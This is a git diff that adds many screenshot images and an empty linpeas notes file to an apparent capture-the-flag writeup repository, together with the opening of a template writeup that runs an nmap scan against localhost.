Binary files /dev/null and b/Hard/prg/2/006.png differ
diff --git a/Hard/prg/2/007.png b/Hard/prg/2/007.png
new file mode 100644
index 0000000..72efcca
Binary files /dev/null and b/Hard/prg/2/007.png differ
diff --git a/Hard/prg/2/008.png b/Hard/prg/2/008.png
new file mode 100644
index 0000000..bee68ef
Binary files /dev/null and b/Hard/prg/2/008.png differ
diff --git a/Hard/prg/2/009.png b/Hard/prg/2/009.png
new file mode 100644
index 0000000..6463df6
Binary files /dev/null and b/Hard/prg/2/009.png differ
diff --git a/Hard/prg/2/010.png b/Hard/prg/2/010.png
new file mode 100644
index 0000000..65089a4
Binary files /dev/null and b/Hard/prg/2/010.png differ
diff --git a/Hard/prg/2/011.png b/Hard/prg/2/011.png
new file mode 100644
index 0000000..b084ccd
Binary files /dev/null and b/Hard/prg/2/011.png differ
diff --git a/Hard/prg/2/012.png b/Hard/prg/2/012.png
new file mode 100644
index 0000000..c2361ff
Binary files /dev/null and b/Hard/prg/2/012.png differ
diff --git a/Hard/prg/2/013.png b/Hard/prg/2/013.png
new file mode 100644
index 0000000..28b7b64
Binary files /dev/null and b/Hard/prg/2/013.png differ
diff --git a/Hard/prg/2/014.png b/Hard/prg/2/014.png
new file mode 100644
index 0000000..eda4f0c
Binary files /dev/null and b/Hard/prg/2/014.png differ
diff --git a/Hard/prg/2/015.png b/Hard/prg/2/015.png
new file mode 100644
index 0000000..cacf83d
Binary files /dev/null and b/Hard/prg/2/015.png differ
diff --git a/Hard/prg/2/016.png b/Hard/prg/2/016.png
new file mode 100644
index 0000000..699bd18
Binary files /dev/null and b/Hard/prg/2/016.png differ
diff --git a/Hard/prg/3/001.png b/Hard/prg/3/001.png
new file mode 100644
index 0000000..565f6ff
Binary files /dev/null and b/Hard/prg/3/001.png differ
diff --git a/Hard/prg/3/002.png b/Hard/prg/3/002.png
new file mode 100644
index 0000000..d90bca3
Binary files /dev/null and b/Hard/prg/3/002.png differ
diff --git a/Hard/prg/3/003.png b/Hard/prg/3/003.png
new file mode 100644
index 0000000..d88dfa1
Binary files /dev/null and b/Hard/prg/3/003.png differ
diff --git a/Hard/prg/3/004.png b/Hard/prg/3/004.png
new file mode 100644
index 0000000..fa232f3
Binary files /dev/null and b/Hard/prg/3/004.png differ
diff --git a/Hard/prg/3/005.png b/Hard/prg/3/005.png
new file mode 100644
index 0000000..73cff6c
Binary files /dev/null and b/Hard/prg/3/005.png differ
diff --git a/Hard/prg/3/006.png b/Hard/prg/3/006.png
new file mode 100644
index 0000000..f034dcb
Binary files /dev/null and b/Hard/prg/3/006.png differ
diff --git a/Hard/prg/3/007.png b/Hard/prg/3/007.png
new file mode 100644
index 0000000..e11aba1
Binary files /dev/null and b/Hard/prg/3/007.png differ
diff --git a/Hard/prg/3/008.png b/Hard/prg/3/008.png
new file mode 100644
index 0000000..7459660
Binary files /dev/null and b/Hard/prg/3/008.png differ
diff --git a/Hard/prg/3/009.png b/Hard/prg/3/009.png
new file mode 100644
index 0000000..394690e
Binary files /dev/null and b/Hard/prg/3/009.png differ
diff --git a/Hard/prg/3/010.png b/Hard/prg/3/010.png
new file mode 100644
index 0000000..cf77d2b
Binary files /dev/null and b/Hard/prg/3/010.png differ
diff --git a/Hard/prg/3/011.png b/Hard/prg/3/011.png
new file mode 100644
index 0000000..f3fe46e
Binary files /dev/null and b/Hard/prg/3/011.png differ
diff --git a/Hard/prg/3/012.png b/Hard/prg/3/012.png
new file mode 100644
index 0000000..2eeb895
Binary files /dev/null and b/Hard/prg/3/012.png differ
diff --git a/Hard/prg/3/013.png b/Hard/prg/3/013.png
new file mode 100644
index 0000000..fcb50ec
Binary files /dev/null and b/Hard/prg/3/013.png differ
diff --git a/Hard/prg/3/014.png b/Hard/prg/3/014.png
new file mode 100644
index 0000000..0a35b91
Binary files /dev/null and b/Hard/prg/3/014.png differ
diff --git a/Hard/prg/3/015.png b/Hard/prg/3/015.png
new file mode 100644
index 0000000..7313575
Binary files /dev/null and b/Hard/prg/3/015.png differ
diff --git a/Hard/prg/3/016.png b/Hard/prg/3/016.png
new file mode 100644
index 0000000..c5896f9
Binary files /dev/null and b/Hard/prg/3/016.png differ
diff --git a/Hard/prg/3/017.png b/Hard/prg/3/017.png
new file mode 100644
index 0000000..b54db48
Binary files /dev/null and b/Hard/prg/3/017.png differ
diff --git a/Hard/prg/3/018.png b/Hard/prg/3/018.png
new file mode 100644
index 0000000..323b06e
Binary files /dev/null and b/Hard/prg/3/018.png differ
diff --git a/Hard/prg/3/019.png b/Hard/prg/3/019.png
new file mode 100644
index 0000000..2d1ce54
Binary files /dev/null and b/Hard/prg/3/019.png differ
diff --git a/Hard/prg/3/020.png b/Hard/prg/3/020.png
new file mode 100644
index 0000000..0da41a6
Binary files /dev/null and b/Hard/prg/3/020.png differ
diff --git a/Hard/prg/3/021.png b/Hard/prg/3/021.png
new file mode 100644
index 0000000..8849c73
Binary files /dev/null and b/Hard/prg/3/021.png differ
diff --git a/Hard/prg/3/022.png b/Hard/prg/3/022.png
new file mode 100644
index 0000000..671640b
Binary files /dev/null and b/Hard/prg/3/022.png differ
diff --git a/Hard/prg/3/023.png b/Hard/prg/3/023.png
new file mode 100644
index 0000000..788c0f9
Binary files /dev/null and b/Hard/prg/3/023.png differ
diff --git a/Hard/prg/3/024.png b/Hard/prg/3/024.png
new file mode 100644
index 0000000..2be0e0f
Binary files /dev/null and b/Hard/prg/3/024.png differ
diff --git a/Hard/prg/3/025.png b/Hard/prg/3/025.png
new file mode 100644
index 0000000..96761f5
Binary files /dev/null and b/Hard/prg/3/025.png differ
diff --git a/Hard/prg/3/026.png b/Hard/prg/3/026.png
new file mode 100644
index 0000000..da9d4be
Binary files /dev/null and b/Hard/prg/3/026.png differ
diff --git a/Hard/prg/3/027.png b/Hard/prg/3/027.png
new file mode 100644
index 0000000..6babb52
Binary files /dev/null and b/Hard/prg/3/027.png differ
diff --git a/Hard/prg/3/028.png b/Hard/prg/3/028.png
new file mode 100644
index 0000000..3a694db
Binary files /dev/null and b/Hard/prg/3/028.png differ
diff --git a/Hard/prg/3/029.png b/Hard/prg/3/029.png
new file mode 100644
index 0000000..98ca01c
Binary files /dev/null and b/Hard/prg/3/029.png differ
diff --git a/Hard/prg/3/030.png b/Hard/prg/3/030.png
new file mode 100644
index 0000000..650fcab
Binary files /dev/null and b/Hard/prg/3/030.png differ
diff --git a/Hard/prg/3/031.png b/Hard/prg/3/031.png
new file mode 100644
index 0000000..9795bdf
Binary files /dev/null and b/Hard/prg/3/031.png differ
diff --git a/Hard/prg/3/032.png b/Hard/prg/3/032.png
new file mode 100644
index 0000000..e25c2f2
Binary files /dev/null and b/Hard/prg/3/032.png differ
diff --git a/Hard/prg/3/033.png b/Hard/prg/3/033.png
new file mode 100644
index 0000000..d70b05b
Binary files /dev/null and b/Hard/prg/3/033.png differ
diff --git a/Hard/prg/3/034.png b/Hard/prg/3/034.png
new file mode 100644
index 0000000..c977f0a
Binary files /dev/null and b/Hard/prg/3/034.png differ
diff --git a/Hard/prg/3/035.png b/Hard/prg/3/035.png
new file mode 100644
index 0000000..43ad21b
Binary files /dev/null and b/Hard/prg/3/035.png differ
diff --git a/Hard/prg/4/001.png b/Hard/prg/4/001.png
new file mode 100644
index 0000000..5af7ff3
Binary files /dev/null and b/Hard/prg/4/001.png differ
diff --git a/Hard/prg/4/002.png b/Hard/prg/4/002.png
new file mode 100644
index 0000000..26837f2
Binary files /dev/null and b/Hard/prg/4/002.png differ
diff --git a/Hard/prg/4/003.png b/Hard/prg/4/003.png
new file mode 100644
index 0000000..8fa7aa6
Binary files /dev/null and b/Hard/prg/4/003.png differ
diff --git a/Hard/prg/4/004.png b/Hard/prg/4/004.png
new file mode 100644
index 0000000..ef14d1f
Binary files /dev/null and b/Hard/prg/4/004.png differ
diff --git a/Hard/prg/4/005.png b/Hard/prg/4/005.png
new file mode 100644
index 0000000..f660590
Binary files /dev/null and b/Hard/prg/4/005.png differ
diff --git a/Hard/prg/4/006.png b/Hard/prg/4/006.png
new file mode 100644
index 0000000..6d475cf
Binary files /dev/null and b/Hard/prg/4/006.png differ
diff --git a/Hard/prg/4/007.png b/Hard/prg/4/007.png
new file mode 100644
index 0000000..1115399
Binary files /dev/null and b/Hard/prg/4/007.png differ
diff --git a/Hard/prg/4/008.png b/Hard/prg/4/008.png
new file mode 100644
index 0000000..68900ba
Binary files /dev/null and b/Hard/prg/4/008.png differ
diff --git a/Hard/prg/4/009.png b/Hard/prg/4/009.png
new file mode 100644
index 0000000..15ed13b
Binary files /dev/null and b/Hard/prg/4/009.png differ
diff --git a/Hard/prg/4/010.png b/Hard/prg/4/010.png
new file mode 100644
index 0000000..7cb0690
Binary files /dev/null and b/Hard/prg/4/010.png differ
diff --git a/Hard/prg/4/011.png b/Hard/prg/4/011.png
new file mode 100644
index 0000000..469a18c
Binary files /dev/null and b/Hard/prg/4/011.png differ
diff --git a/Hard/prg/4/012.png b/Hard/prg/4/012.png
new file mode 100644
index 0000000..7db3d4e
Binary files /dev/null and b/Hard/prg/4/012.png differ
diff --git a/Hard/prg/4/013.png b/Hard/prg/4/013.png
new file mode 100644
index 0000000..bb14f43
Binary files /dev/null and b/Hard/prg/4/013.png differ
diff --git a/Hard/prg/4/014.png b/Hard/prg/4/014.png
new file mode 100644
index 0000000..c2faa96
Binary files /dev/null and b/Hard/prg/4/014.png differ
diff --git a/Hard/prg/4/015.png b/Hard/prg/4/015.png
new file mode 100644
index 0000000..28732f1
Binary files /dev/null and b/Hard/prg/4/015.png differ
diff --git a/Hard/prg/4/016.png b/Hard/prg/4/016.png
new file mode 100644
index 0000000..1997923
Binary files /dev/null and b/Hard/prg/4/016.png differ
diff --git a/Hard/prg/5/1.png b/Hard/prg/5/1.png
new file mode 100644
index 0000000..20ea1da
Binary files /dev/null and b/Hard/prg/5/1.png differ
diff --git a/Hard/prg/5/2.png b/Hard/prg/5/2.png
new file mode 100644
index 0000000..f01832c
Binary files /dev/null and b/Hard/prg/5/2.png differ
diff --git a/Hard/prg/5/3.png b/Hard/prg/5/3.png
new file mode 100644
index 0000000..2e2544a
Binary files /dev/null and b/Hard/prg/5/3.png differ
diff --git a/Hard/prg/5/4.png b/Hard/prg/5/4.png
new file mode 100644
index 0000000..a56aeba
Binary files /dev/null and b/Hard/prg/5/4.png differ
diff --git a/Hard/prg/5/5.png b/Hard/prg/5/5.png
new file mode 100644
index 0000000..ad6e8cb
Binary files /dev/null and b/Hard/prg/5/5.png differ
diff --git a/Hard/prg/5/6.png b/Hard/prg/5/6.png
new file mode 100644
index 0000000..024afed
Binary files /dev/null and b/Hard/prg/5/6.png differ
diff --git a/Hard/prg/5/7.png b/Hard/prg/5/7.png
new file mode 100644
index 0000000..e559646
Binary files /dev/null and b/Hard/prg/5/7.png differ
diff --git a/Hard/prg/5/8.png b/Hard/prg/5/8.png
new file mode 100644
index 0000000..2dc876c
Binary files /dev/null and b/Hard/prg/5/8.png differ
diff --git a/Hard/prg/5/9.png b/Hard/prg/5/9.png
new file mode 100644
index 0000000..9154f71
Binary files /dev/null and b/Hard/prg/5/9.png differ
diff --git a/Hard/prg/6/1.png b/Hard/prg/6/1.png
new file mode 100644
index 0000000..a8416f3
Binary files /dev/null and b/Hard/prg/6/1.png differ
diff --git a/Hard/prg/6/10.png b/Hard/prg/6/10.png
new file mode 100644
index 0000000..d545995
Binary files /dev/null and b/Hard/prg/6/10.png differ
diff --git a/Hard/prg/6/2.png b/Hard/prg/6/2.png
new file mode 100644
index 0000000..cb451d6
Binary files /dev/null and b/Hard/prg/6/2.png differ
diff --git a/Hard/prg/6/3.png b/Hard/prg/6/3.png
new file mode 100644
index 0000000..0bab903
Binary files /dev/null and b/Hard/prg/6/3.png differ
diff --git a/Hard/prg/6/4.png b/Hard/prg/6/4.png
new file mode 100644
index 0000000..f93c84d
Binary files /dev/null and b/Hard/prg/6/4.png differ
diff --git a/Hard/prg/6/5.png b/Hard/prg/6/5.png
new file mode 100644
index 0000000..e24b8cb
Binary files /dev/null and b/Hard/prg/6/5.png differ
diff --git a/Hard/prg/6/6.png b/Hard/prg/6/6.png
new file mode 100644
index 0000000..763e711
Binary files /dev/null and b/Hard/prg/6/6.png differ
diff --git a/Hard/prg/6/7.png b/Hard/prg/6/7.png
new file mode 100644
index 0000000..6cbc4e8
Binary files /dev/null and b/Hard/prg/6/7.png differ
diff --git a/Hard/prg/6/8.png b/Hard/prg/6/8.png
new file mode 100644
index 0000000..876b911
Binary files /dev/null and b/Hard/prg/6/8.png differ
diff --git a/Hard/prg/6/9.png b/Hard/prg/6/9.png
new file mode 100644
index 0000000..cf79175
Binary files /dev/null and b/Hard/prg/6/9.png differ
diff --git a/Hard/prg/7/1.png b/Hard/prg/7/1.png
new file mode 100644
index 0000000..b2f2632
Binary files /dev/null and b/Hard/prg/7/1.png differ
diff --git a/Hard/prg/7/10.png b/Hard/prg/7/10.png
new file mode 100644
index 0000000..4d98041
Binary files /dev/null and b/Hard/prg/7/10.png differ
diff --git a/Hard/prg/7/11.png b/Hard/prg/7/11.png
new file mode 100644
index 0000000..234b0e4
Binary files /dev/null and b/Hard/prg/7/11.png differ
diff --git a/Hard/prg/7/12.png b/Hard/prg/7/12.png
new file mode 100644
index 0000000..c672a9b
Binary files /dev/null and b/Hard/prg/7/12.png differ
diff --git a/Hard/prg/7/13.png b/Hard/prg/7/13.png
new file mode 100644
index 0000000..ac3e7ef
Binary files /dev/null and b/Hard/prg/7/13.png differ
diff --git a/Hard/prg/7/14.png b/Hard/prg/7/14.png
new file mode 100644
index 0000000..aa78838
Binary files /dev/null and b/Hard/prg/7/14.png differ
diff --git a/Hard/prg/7/15.png b/Hard/prg/7/15.png
new file mode 100644
index 0000000..4aa0e78
Binary files /dev/null and b/Hard/prg/7/15.png differ
diff --git a/Hard/prg/7/16.png b/Hard/prg/7/16.png
new file mode 100644
index 0000000..c7834c9
Binary files /dev/null and b/Hard/prg/7/16.png differ
diff --git a/Hard/prg/7/162.png b/Hard/prg/7/162.png
new file mode 100644
index 0000000..af17c8c
Binary files /dev/null and b/Hard/prg/7/162.png differ
diff --git a/Hard/prg/7/17.png b/Hard/prg/7/17.png
new file mode 100644
index 0000000..1f1e4c4
Binary files /dev/null and b/Hard/prg/7/17.png differ
diff --git a/Hard/prg/7/18.png b/Hard/prg/7/18.png
new file mode 100644
index 0000000..2fea500
Binary files /dev/null and b/Hard/prg/7/18.png differ
diff --git a/Hard/prg/7/19.png b/Hard/prg/7/19.png
new file mode 100644
index 0000000..5d65317
Binary files /dev/null and b/Hard/prg/7/19.png differ
diff --git a/Hard/prg/7/2.png b/Hard/prg/7/2.png
new file mode 100644
index 0000000..e541ea6
Binary files /dev/null and b/Hard/prg/7/2.png differ
diff --git a/Hard/prg/7/3.png b/Hard/prg/7/3.png
new file mode 100644
index 0000000..9f272ab
Binary files /dev/null and b/Hard/prg/7/3.png differ
diff --git a/Hard/prg/7/4.png b/Hard/prg/7/4.png
new file mode 100644
index 0000000..b70162f
Binary files /dev/null and b/Hard/prg/7/4.png differ
diff --git a/Hard/prg/7/5.png b/Hard/prg/7/5.png
new file mode 100644
index 0000000..729af2f
Binary files /dev/null and b/Hard/prg/7/5.png differ
diff --git a/Hard/prg/7/6.png b/Hard/prg/7/6.png
new file mode 100644
index 0000000..42ec547
Binary files /dev/null and b/Hard/prg/7/6.png differ
diff --git a/Hard/prg/7/7.png b/Hard/prg/7/7.png
new file mode 100644
index 0000000..b381f50
Binary files /dev/null and b/Hard/prg/7/7.png differ
diff --git a/Hard/prg/7/8.png b/Hard/prg/7/8.png
new file mode 100644
index 0000000..a283ea1
Binary files /dev/null and b/Hard/prg/7/8.png differ
diff --git a/Hard/prg/7/9.png b/Hard/prg/7/9.png
new file mode 100644
index 0000000..67fdcf0
Binary files /dev/null and b/Hard/prg/7/9.png differ
diff --git a/Hard/prg/8/1.png b/Hard/prg/8/1.png
new file mode 100644
index 0000000..b0038f8
Binary files /dev/null and b/Hard/prg/8/1.png differ
diff --git a/Hard/prg/8/10.png b/Hard/prg/8/10.png
new file mode 100644
index 0000000..391775d
Binary files /dev/null and b/Hard/prg/8/10.png differ
diff --git a/Hard/prg/8/11.png b/Hard/prg/8/11.png
new file mode 100644
index 0000000..a5fbaf7
Binary files /dev/null and b/Hard/prg/8/11.png differ
diff --git a/Hard/prg/8/12.png b/Hard/prg/8/12.png
new file mode 100644
index 0000000..22f5f23
Binary files /dev/null and b/Hard/prg/8/12.png differ
diff --git a/Hard/prg/8/13.png b/Hard/prg/8/13.png
new file mode 100644
index 0000000..b7519d4
Binary files /dev/null and b/Hard/prg/8/13.png differ
diff --git a/Hard/prg/8/14.png b/Hard/prg/8/14.png
new file mode 100644
index 0000000..f7b5ab5
Binary files /dev/null and b/Hard/prg/8/14.png differ
diff --git a/Hard/prg/8/15.png b/Hard/prg/8/15.png
new file mode 100644
index 0000000..ebd509e
Binary files /dev/null and b/Hard/prg/8/15.png differ
diff --git a/Hard/prg/8/16.png b/Hard/prg/8/16.png
new file mode 100644
index 0000000..8fb122d
Binary files /dev/null and b/Hard/prg/8/16.png differ
diff --git a/Hard/prg/8/17.png b/Hard/prg/8/17.png
new file mode 100644
index 0000000..f326907
Binary files /dev/null and b/Hard/prg/8/17.png differ
diff --git a/Hard/prg/8/18.png b/Hard/prg/8/18.png
new file mode 100644
index 0000000..b8fb85c
Binary files /dev/null and b/Hard/prg/8/18.png differ
diff --git a/Hard/prg/8/19.png b/Hard/prg/8/19.png
new file mode 100644
index 0000000..f6da982
Binary files /dev/null and b/Hard/prg/8/19.png differ
diff --git a/Hard/prg/8/2.png b/Hard/prg/8/2.png
new file mode 100644
index 0000000..b3cc67c
Binary files /dev/null and b/Hard/prg/8/2.png differ
diff --git a/Hard/prg/8/20.png b/Hard/prg/8/20.png
new file mode 100644
index 0000000..9778e7f
Binary files /dev/null and b/Hard/prg/8/20.png differ
diff --git a/Hard/prg/8/21.png b/Hard/prg/8/21.png
new file mode 100644
index 0000000..0650731
Binary files /dev/null and b/Hard/prg/8/21.png differ
diff --git a/Hard/prg/8/22.png b/Hard/prg/8/22.png
new file mode 100644
index 0000000..811abd5
Binary files /dev/null and b/Hard/prg/8/22.png differ
diff --git a/Hard/prg/8/23.png b/Hard/prg/8/23.png
new file mode 100644
index 0000000..c067b21
Binary files /dev/null and b/Hard/prg/8/23.png differ
diff --git a/Hard/prg/8/24.png b/Hard/prg/8/24.png
new file mode 100644
index 0000000..fdae390
Binary files /dev/null and b/Hard/prg/8/24.png differ
diff --git a/Hard/prg/8/25.png b/Hard/prg/8/25.png
new file mode 100644
index 0000000..cefba05
Binary files /dev/null and b/Hard/prg/8/25.png differ
diff --git a/Hard/prg/8/26.png b/Hard/prg/8/26.png
new file mode 100644
index 0000000..a527a28
Binary files /dev/null and b/Hard/prg/8/26.png differ
diff --git a/Hard/prg/8/27.png b/Hard/prg/8/27.png
new file mode 100644
index 0000000..0fa0061
Binary files /dev/null and b/Hard/prg/8/27.png differ
diff --git a/Hard/prg/8/28.png b/Hard/prg/8/28.png
new file mode 100644
index 0000000..b2c738e
Binary files /dev/null and b/Hard/prg/8/28.png differ
diff --git a/Hard/prg/8/29.png b/Hard/prg/8/29.png
new file mode 100644
index 0000000..9ef713e
Binary files /dev/null and b/Hard/prg/8/29.png differ
diff --git a/Hard/prg/8/3.png b/Hard/prg/8/3.png
new file mode 100644
index 0000000..5880c83
Binary files /dev/null and b/Hard/prg/8/3.png differ
diff --git a/Hard/prg/8/30.png b/Hard/prg/8/30.png
new file mode 100644
index 0000000..895ee50
Binary files /dev/null and b/Hard/prg/8/30.png differ
diff --git a/Hard/prg/8/31.png b/Hard/prg/8/31.png
new file mode 100644
index 0000000..3a14f2e
Binary files /dev/null and b/Hard/prg/8/31.png differ
diff --git a/Hard/prg/8/32.png b/Hard/prg/8/32.png
new file mode 100644
index 0000000..5d5dc4f
Binary files /dev/null and b/Hard/prg/8/32.png differ
diff --git a/Hard/prg/8/33.png b/Hard/prg/8/33.png
new file mode 100644
index 0000000..3245503
Binary files /dev/null and b/Hard/prg/8/33.png differ
diff --git a/Hard/prg/8/34.png b/Hard/prg/8/34.png
new file mode 100644
index 0000000..d9bc9e7
Binary files /dev/null and b/Hard/prg/8/34.png differ
diff --git a/Hard/prg/8/35.png b/Hard/prg/8/35.png
new file mode 100644
index 0000000..fa72602
Binary files /dev/null and b/Hard/prg/8/35.png differ
diff --git a/Hard/prg/8/36.png b/Hard/prg/8/36.png
new file mode 100644
index 0000000..0cd51ac
Binary files /dev/null and b/Hard/prg/8/36.png differ
diff --git a/Hard/prg/8/4.png b/Hard/prg/8/4.png
new file mode 100644
index 0000000..9ab1922
Binary files /dev/null and b/Hard/prg/8/4.png differ
diff --git a/Hard/prg/8/5.png b/Hard/prg/8/5.png
new file mode 100644
index 0000000..4ae0e87
Binary files /dev/null and b/Hard/prg/8/5.png differ
diff --git a/Hard/prg/8/6.png b/Hard/prg/8/6.png
new file mode 100644
index 0000000..0884291
Binary files /dev/null and b/Hard/prg/8/6.png differ
diff --git a/Hard/prg/8/7.png b/Hard/prg/8/7.png
new file mode 100644
index 0000000..fe92557
Binary files /dev/null and b/Hard/prg/8/7.png differ
diff --git a/Hard/prg/8/8.png b/Hard/prg/8/8.png
new file mode 100644
index 0000000..ebb4db8
Binary files /dev/null and b/Hard/prg/8/8.png differ
diff --git a/Hard/prg/8/9.png b/Hard/prg/8/9.png
new file mode 100644
index 0000000..809854e
Binary files /dev/null and b/Hard/prg/8/9.png differ
diff --git a/Hard/prg/9/1.png b/Hard/prg/9/1.png
new file mode 100644
index 0000000..412e912
Binary files /dev/null and b/Hard/prg/9/1.png differ
diff --git a/Hard/prg/9/10.png b/Hard/prg/9/10.png
new file mode 100644
index 0000000..f2d6fa2
Binary files /dev/null and b/Hard/prg/9/10.png differ
diff --git a/Hard/prg/9/11.png b/Hard/prg/9/11.png
new file mode 100644
index 0000000..24f82db
Binary files /dev/null and b/Hard/prg/9/11.png differ
diff --git a/Hard/prg/9/12.png b/Hard/prg/9/12.png
new file mode 100644
index 0000000..e57c752
Binary files /dev/null and b/Hard/prg/9/12.png differ
diff --git a/Hard/prg/9/13.png b/Hard/prg/9/13.png
new file mode 100644
index 0000000..ec92596
Binary files /dev/null and b/Hard/prg/9/13.png differ
diff --git a/Hard/prg/9/14.png b/Hard/prg/9/14.png
new file mode 100644
index 0000000..61a4d1a
Binary files /dev/null and b/Hard/prg/9/14.png differ
diff --git a/Hard/prg/9/15.png b/Hard/prg/9/15.png
new file mode 100644
index 0000000..7d7ac1f
Binary files /dev/null and b/Hard/prg/9/15.png differ
diff --git a/Hard/prg/9/16.png b/Hard/prg/9/16.png
new file mode 100644
index 0000000..aedc906
Binary files /dev/null and b/Hard/prg/9/16.png differ
diff --git a/Hard/prg/9/17.png b/Hard/prg/9/17.png
new file mode 100644
index 0000000..0c41437
Binary files /dev/null and b/Hard/prg/9/17.png differ
diff --git a/Hard/prg/9/18.png b/Hard/prg/9/18.png
new file mode 100644
index 0000000..8cac2da
Binary files /dev/null and b/Hard/prg/9/18.png differ
diff --git a/Hard/prg/9/19.png b/Hard/prg/9/19.png
new file mode 100644
index 0000000..c19fdb0
Binary files /dev/null and b/Hard/prg/9/19.png differ
diff --git a/Hard/prg/9/2.png b/Hard/prg/9/2.png
new file mode 100644
index 0000000..f13ceb9
Binary files /dev/null and b/Hard/prg/9/2.png differ
diff --git a/Hard/prg/9/20.png b/Hard/prg/9/20.png
new file mode 100644
index 0000000..283795e
Binary files /dev/null and b/Hard/prg/9/20.png differ
diff --git a/Hard/prg/9/21.png b/Hard/prg/9/21.png
new file mode 100644
index 0000000..18a5741
Binary files /dev/null and b/Hard/prg/9/21.png differ
diff --git a/Hard/prg/9/22.png b/Hard/prg/9/22.png
new file mode 100644
index 0000000..55a6cf6
Binary files /dev/null and b/Hard/prg/9/22.png differ
diff --git a/Hard/prg/9/23.png b/Hard/prg/9/23.png
new file mode 100644
index 0000000..161824d
Binary files /dev/null and b/Hard/prg/9/23.png differ
diff --git a/Hard/prg/9/24.png b/Hard/prg/9/24.png
new file mode 100644
index 0000000..e6702db
Binary files /dev/null and b/Hard/prg/9/24.png differ
diff --git a/Hard/prg/9/25.png b/Hard/prg/9/25.png
new file mode 100644
index 0000000..c6f8e2b
Binary files /dev/null and b/Hard/prg/9/25.png differ
diff --git a/Hard/prg/9/26.png b/Hard/prg/9/26.png
new file mode 100644
index 0000000..90693fc
Binary files /dev/null and b/Hard/prg/9/26.png differ
diff --git a/Hard/prg/9/27.png b/Hard/prg/9/27.png
new file mode 100644
index 0000000..3b6fff0
Binary files /dev/null and b/Hard/prg/9/27.png differ
diff --git a/Hard/prg/9/28.png b/Hard/prg/9/28.png
new file mode 100644
index 0000000..deb8aa6
Binary files /dev/null and b/Hard/prg/9/28.png differ
diff --git a/Hard/prg/9/29.png b/Hard/prg/9/29.png
new file mode 100644
index 0000000..75a3eb2
Binary files /dev/null and b/Hard/prg/9/29.png differ
diff --git a/Hard/prg/9/3.png b/Hard/prg/9/3.png
new file mode 100644
index 0000000..b0edf69
Binary files /dev/null and b/Hard/prg/9/3.png differ
diff --git a/Hard/prg/9/30.png b/Hard/prg/9/30.png
new file mode 100644
index 0000000..7f86c0a
Binary files /dev/null and b/Hard/prg/9/30.png differ
diff --git a/Hard/prg/9/31.png b/Hard/prg/9/31.png
new file mode 100644
index 0000000..c8b6094
Binary files /dev/null and b/Hard/prg/9/31.png differ
diff --git a/Hard/prg/9/32.png b/Hard/prg/9/32.png
new file mode 100644
index 0000000..2a8537d
Binary files /dev/null and b/Hard/prg/9/32.png differ
diff --git a/Hard/prg/9/33.png b/Hard/prg/9/33.png
new file mode 100644
index 0000000..e967da7
Binary files /dev/null and b/Hard/prg/9/33.png differ
diff --git a/Hard/prg/9/34.png b/Hard/prg/9/34.png
new file mode 100644
index 0000000..c088d77
Binary files /dev/null and b/Hard/prg/9/34.png differ
diff --git a/Hard/prg/9/35.png b/Hard/prg/9/35.png
new file mode 100644
index 0000000..caea933
Binary files /dev/null and b/Hard/prg/9/35.png differ
diff --git a/Hard/prg/9/36.png b/Hard/prg/9/36.png
new file mode 100644
index 0000000..862c707
Binary files /dev/null and b/Hard/prg/9/36.png differ
diff --git a/Hard/prg/9/37.png b/Hard/prg/9/37.png
new file mode 100644
index 0000000..d9e52ec
Binary files /dev/null and b/Hard/prg/9/37.png differ
diff --git a/Hard/prg/9/38.png b/Hard/prg/9/38.png
new file mode 100644
index 0000000..59f04d1
Binary files /dev/null and b/Hard/prg/9/38.png differ
diff --git a/Hard/prg/9/39.png b/Hard/prg/9/39.png
new file mode 100644
index 0000000..e1c974e
Binary files /dev/null and b/Hard/prg/9/39.png differ
diff --git a/Hard/prg/9/4.png b/Hard/prg/9/4.png
new file mode 100644
index 0000000..1507cdb
Binary files /dev/null and b/Hard/prg/9/4.png differ
diff --git a/Hard/prg/9/40.png b/Hard/prg/9/40.png
new file mode 100644
index 0000000..9b9be48
Binary files /dev/null and b/Hard/prg/9/40.png differ
diff --git a/Hard/prg/9/41.png b/Hard/prg/9/41.png
new file mode 100644
index 0000000..13fc38d
Binary files /dev/null and b/Hard/prg/9/41.png differ
diff --git a/Hard/prg/9/42.png b/Hard/prg/9/42.png
new file mode 100644
index 0000000..6f7e711
Binary files /dev/null and b/Hard/prg/9/42.png differ
diff --git a/Hard/prg/9/43.png b/Hard/prg/9/43.png
new file mode 100644
index 0000000..a9c44a0
Binary files /dev/null and b/Hard/prg/9/43.png differ
diff --git a/Hard/prg/9/44.png b/Hard/prg/9/44.png
new file mode 100644
index 0000000..3cb43ca
Binary files /dev/null and b/Hard/prg/9/44.png differ
diff --git a/Hard/prg/9/45.png b/Hard/prg/9/45.png
new file mode 100644
index 0000000..e8b05c0
Binary files /dev/null and b/Hard/prg/9/45.png differ
diff --git a/Hard/prg/9/46.png b/Hard/prg/9/46.png
new file mode 100644
index 0000000..e24bc01
Binary files /dev/null and b/Hard/prg/9/46.png differ
diff --git a/Hard/prg/9/5.png b/Hard/prg/9/5.png
new file mode 100644
index 0000000..92d1811
Binary files /dev/null and b/Hard/prg/9/5.png differ
diff --git a/Hard/prg/9/6.png b/Hard/prg/9/6.png
new file mode 100644
index 0000000..be10f0d
Binary files /dev/null and b/Hard/prg/9/6.png differ
diff --git a/Hard/prg/9/7.png b/Hard/prg/9/7.png
new file mode 100644
index 0000000..7efb68c
Binary files /dev/null and b/Hard/prg/9/7.png differ
diff --git a/Hard/prg/9/8.png b/Hard/prg/9/8.png
new file mode 100644
index 0000000..254a555
Binary files /dev/null and b/Hard/prg/9/8.png differ
diff --git a/Hard/prg/9/9.png b/Hard/prg/9/9.png
new file mode 100644
index 0000000..cd4851b
Binary files /dev/null and b/Hard/prg/9/9.png differ
diff --git a/Hard/prg/9/linpeas.md b/Hard/prg/9/linpeas.md
new file mode 100644
index 0000000..8b13789
--- /dev/null
+++ b/Hard/prg/9/linpeas.md
@@ -0,0 +1 @@
+
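Review bot: `Hard/prg/9/linpeas.md` is committed as an empty file (the whole hunk is one blank `+` line), so the tree gains a placeholder that promises linpeas notes and delivers none; either fill it with the enumeration output the filename refers to or drop it from this commit and add it once there is content.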
diff --git a/Insane/0.md b/Insane/0.md
new file mode 100644
index 0000000..78996b5
--- /dev/null
+++ b/Insane/0.md
@@ -0,0 +1,38 @@
+# Writeup
+
+
+
+## Introduction :
+
+the text goes here
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 127.0.0.1 ] [~]
+ → nmap -F 127.0.0.1
